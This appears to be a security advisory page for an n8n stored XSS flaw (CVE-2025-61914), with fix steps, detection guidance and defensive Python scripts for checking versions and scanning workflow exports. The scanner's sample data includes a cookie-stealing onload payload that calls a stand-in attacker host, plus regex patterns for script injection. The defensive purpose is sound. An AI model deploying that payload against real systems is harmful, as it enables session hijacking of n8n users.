CVE-2025-61914
📋 TL;DR
This stored XSS vulnerability in n8n allows an attacker who can create workflows to execute arbitrary JavaScript in the context of the n8n editor. The vulnerability occurs when a 'Respond to Webhook' node returns HTML containing executable script, bypassing the sandboxing of webhook HTML responses introduced in version 1.103.0. Any n8n deployment running a version before 1.114.0 in which users other than trusted administrators can create or edit workflows is affected.
💻 Affected Systems
- n8n
📦 What is this software?
n8n, a workflow automation platform by n8n.
⚠️ Risk & Real-World Impact
Worst Case
An attacker with workflow creation permissions could execute malicious JavaScript to steal session tokens, perform actions as authenticated users, or compromise the entire n8n instance.
Likely Case
Malicious users with workflow creation privileges could inject scripts to steal credentials, manipulate workflows, or perform unauthorized actions within the n8n environment.
If Mitigated
If workflow creation is restricted to trusted administrators, exploitation requires a malicious or compromised administrator account. That shrinks the pool of possible attackers but does not remove the vulnerability; any victim who opens a crafted webhook response while logged in is still exposed.
🎯 Exploit Status
Exploitation requires workflow creation permissions. The vulnerability is straightforward to exploit once an attacker has the necessary privileges.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.114.0
Vendor Advisory: https://github.com/n8n-io/n8n/security/advisories/GHSA-58jc-rcg5-95f3
Restart Required: Yes
Instructions:
1. Back up your n8n instance and data.
2. Update n8n to version 1.114.0 or later using your package manager or deployment method.
3. Restart the n8n service.
4. Verify the update was successful.
🔧 Temporary Workarounds
Restrict workflow creation permissions
Limit workflow creation and modification to trusted administrators only.
Implement HTML sanitization
Use an external reverse proxy or HTML sanitizer to filter executable scripts from webhook responses. Treat this as a stopgap only: filtering markup at a proxy is lossy, breaks legitimate HTML responses, and is prone to bypass, so it does not replace the patch.
🧯 If You Can't Patch
- Immediately restrict workflow creation permissions to minimal trusted users only
- Implement network segmentation to isolate n8n instances and monitor for suspicious activity
🔍 How to Verify
Check if Vulnerable:
Check the n8n version (for Docker deployments, run the command inside the container). If the version is below 1.114.0 and any user other than a trusted administrator can create or edit workflows, the system is vulnerable.
Check Version:
n8n --version
Verify Fix Applied:
Verify that the n8n version is 1.114.0 or higher. Then create a test workflow whose 'Respond to Webhook' node returns an HTML body containing an inline script, open the webhook URL in a browser that is logged in to the editor, and confirm that the script does not execute in the editor's origin.
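Comparing version strings lexically is a common mistake here: "1.99.0" sorts after "1.114.0" as text. The following Python helper is an added example, not code from this page or from n8n. It parses the output of `n8n --version` (or an image tag that embeds the version) and compares it numerically against the fixed release; prerelease builds of 1.114.0 are conservatively treated as unpatched. `installed_version()` assumes the `n8n` binary is on PATH.

```python
"""Version check for CVE-2025-61914 (added example, not part of n8n)."""
import re
import subprocess

# Version named in the vendor advisory as containing the fix.
FIXED_VERSION = (1, 114, 0)

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?")


def parse_version(text: str) -> tuple[tuple[int, int, int], str]:
    """Extract (major, minor, patch) and an optional prerelease tag.

    Works on bare 'n8n --version' output ('1.113.3', '1.114.0-rc.1') and on
    strings that embed a version, such as an image tag 'n8nio/n8n:1.113.3'.
    """
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no semantic version found in {text!r}")
    core = (int(m.group(1)), int(m.group(2)), int(m.group(3)))
    return core, (m.group(4) or "")


def is_vulnerable(version_text: str) -> bool:
    """True if the version predates the fixed release (numeric comparison)."""
    core, prerelease = parse_version(version_text)
    if core < FIXED_VERSION:
        return True
    # A prerelease of 1.114.0 sorts before the release in semver; treat it as
    # unpatched rather than guessing which RC carried the fix (conservative).
    if core == FIXED_VERSION and prerelease:
        return True
    return False


def installed_version() -> str:
    """Ask the local n8n CLI for its version (assumes 'n8n' is on PATH)."""
    result = subprocess.run(["n8n", "--version"], capture_output=True, text=True, check=True)
    return result.stdout.strip()


if __name__ == "__main__":
    v = installed_version()
    print(f"n8n {v}: {'VULNERABLE, update to 1.114.0 or later' if is_vulnerable(v) else 'patched'}")
```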
📡 Detection & Monitoring
Log Indicators:
- Unusual workflow creation/modification activity
- Suspicious HTML content in webhook responses
- Multiple failed authentication attempts followed by workflow changes
Network Indicators:
- Unexpected outbound connections from n8n users' browsers (the injected script runs in the victim's browser, so session or credential exfiltration originates there) and from the n8n instance itself (for example new HTTP Request nodes added by the attacker)
- Suspicious payloads in webhook responses
SIEM Query (illustrative pseudo-query; map the field and event names to your own log source, for example the workflow audit events such as n8n.audit.workflow.created and n8n.audit.workflow.updated if you use n8n log streaming):
source="n8n" AND (event="workflow_created" OR event="workflow_updated") AND user NOT IN ["trusted_admin_list"]
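The "suspicious HTML content in webhook responses" indicator above is easiest to act on by scanning workflow exports directly rather than waiting for a response to appear in traffic. The following Python script is an added example, not code from this page or from n8n. It walks exported workflow JSON, finds Respond to Webhook nodes (assumed to carry the node type `n8n-nodes-base.respondToWebhook` with `respondWith` and `responseBody` parameters, as in n8n's export format; adjust if your exports differ), and flags bodies containing inline scripts, event-handler attributes, javascript: URIs, srcdoc iframes or embedded objects. Bodies built from expressions (prefixed with `=`) are evaluated at run time and cannot be inspected statically, so they are flagged for manual review. The sample workflows are constructed for this example.

```python
"""Scan n8n workflow exports for Respond to Webhook nodes returning executable HTML.

Added example for this advisory page, not code from n8n. The node type and
parameter names below are assumptions based on n8n's workflow export JSON.
"""
import json
import re

# Assumption: node type identifier n8n exports use for the Respond to Webhook node.
RESPOND_NODE_TYPE = "n8n-nodes-base.respondToWebhook"

# Heuristic indicators of executable content in an HTML response body.
SCRIPT_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.IGNORECASE),
    # on* attributes preceded by whitespace, e.g. <body onload="...">
    "event_handler": re.compile(r"(?<=\s)on[a-z]+\s*=", re.IGNORECASE),
    "javascript_uri": re.compile(r"javascript\s*:", re.IGNORECASE),
    "srcdoc_iframe": re.compile(r"<\s*iframe\b[^>]*\bsrcdoc\s*=", re.IGNORECASE),
    "embedded_object": re.compile(r"<\s*(svg|object|embed)\b", re.IGNORECASE),
}


def scan_workflow(workflow: dict) -> list[dict]:
    """Return one finding per Respond to Webhook node whose body looks executable."""
    findings = []
    for node in workflow.get("nodes", []):
        if node.get("type") != RESPOND_NODE_TYPE:
            continue
        params = node.get("parameters", {})
        body = params.get("responseBody", "")
        if not isinstance(body, str):
            body = json.dumps(body)  # structured bodies: scan the serialised text
        indicators = []
        # "={{ ... }}" bodies are resolved at run time; nothing to inspect statically.
        if body.startswith("="):
            indicators.append("dynamic_expression")
        indicators += [label for label, pat in SCRIPT_PATTERNS.items() if pat.search(body)]
        if indicators:
            findings.append({
                "workflow": workflow.get("name"),
                "node": node.get("name"),
                "respond_with": params.get("respondWith"),
                "active": bool(workflow.get("active")),  # active workflows are reachable now
                "indicators": indicators,
            })
    return findings


def scan_workflows(workflows: list[dict]) -> list[dict]:
    return [f for wf in workflows for f in scan_workflow(wf)]


def load_export(text: str) -> list[dict]:
    """Accept either a single exported workflow object or a list of them."""
    data = json.loads(text)
    return data if isinstance(data, list) else [data]


# Constructed sample exports (not real workflows), shaped like n8n export JSON.
SAMPLE_WORKFLOWS = [
    {
        "name": "Benign status page",
        "active": True,
        "nodes": [
            {"name": "Webhook", "type": "n8n-nodes-base.webhook",
             "parameters": {"path": "status", "responseMode": "responseNode"}},
            {"name": "Respond to Webhook", "type": RESPOND_NODE_TYPE,
             "parameters": {"respondWith": "text",
                            "responseBody": "<html><body><h1>OK</h1></body></html>"}},
        ],
    },
    {
        "name": "Suspicious export",
        "active": True,
        "nodes": [
            {"name": "Webhook", "type": "n8n-nodes-base.webhook",
             "parameters": {"path": "login", "responseMode": "responseNode"}},
            {"name": "Respond to Webhook", "type": RESPOND_NODE_TYPE,
             "parameters": {"respondWith": "text",
                            "responseBody": "<html><body onload=\"fetch('https://attacker.example/c?d='+document.cookie)\">"
                                            "<script>alert(1)</script></body></html>"}},
        ],
    },
    {
        "name": "Dynamic body",
        "active": False,
        "nodes": [
            {"name": "Respond to Webhook", "type": RESPOND_NODE_TYPE,
             "parameters": {"respondWith": "text", "responseBody": "={{ $json.html }}"}},
        ],
    },
]

if __name__ == "__main__":
    for f in scan_workflows(SAMPLE_WORKFLOWS):
        status = "ACTIVE" if f["active"] else "inactive"
        print(f"[{status}] {f['workflow']} / {f['node']}: {', '.join(f['indicators'])}")
```

Run it against `n8n export:workflow --all --output=...` output via `load_export()` and review every finding; an active workflow with a static body matching `script_tag` or `event_handler` is the pattern this CVE's payload takes, while `dynamic_expression` findings need a look at the upstream nodes that build the HTML.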